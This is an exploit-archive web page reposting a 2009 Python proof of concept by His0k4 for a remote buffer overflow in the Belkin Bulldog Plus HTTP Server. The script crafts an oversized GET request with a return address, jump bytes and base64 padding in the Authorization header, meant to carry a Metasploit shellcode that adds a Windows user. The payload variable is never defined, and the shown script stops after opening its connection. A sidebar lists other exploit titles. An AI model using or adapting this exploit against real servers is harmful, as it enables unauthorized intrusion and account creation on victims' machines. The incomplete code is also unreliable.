首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
来源:www.vfcocus.net 作者:His0k4 发布时间:2009-04-28  

# _  _   _         __    _     _ _ 
#| || | (_)  ___  /  \  | |__ | | |
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  \__/  |_\_\   |_|
#[*] Usage   : belkin.py [victime_ip]
#[*] Bug     : Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
#[*] Credits go to : Elazar Broad
#[*] Tested on :    Xp sp3 (EN)(VB)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com
#[*] Chabiba wa sayd el ba7ri :D

import sys, socket
import base64

host = sys.argv[1]
port = 80

# win32_adduser -  PASS=27 EXITFUNC=seh USER=DZ Size=477 Encoder=PexAlphaNum http://metasploit.com

jump="\xFF\x54\x24\x58" #Jump to the GET request wich contains our shellcode.

ret="\xFF\x17\x49\x7E" #Friendly jmp esp "user32.dll".

junk = "\x41"*16

exploit1 = base64.encodestring(ret + jump + junk)
exploit2 = shellcode

head =  'GET '+exploit2+' HTTP/1.1\r\n'
head += 'Authorization: Basic '+exploit1+'\r\n\r\n'

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·Teraway LinkTracker 1.0 Remote
·Zervit HTTP Server versions 0.
·ECShop 2.5.0 (order_sn) Remote
·Absolute Form Processor XE-V v
·EZ-Blog Beta2 (category) Remot
·SDP Downloader version 2.3.0 l
·iodined <= 0.4.2-2 (forged DNS
·iodined <= 0.4.2 DoS exploit
·LightBlog <= 9.9.2 (register.p
·Linux Kernel 2.6.x SCTP FWD Me
·Icewarp Merak Mail Server 9.4.
·VisionLMS 1.0 (changePW.php) R
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved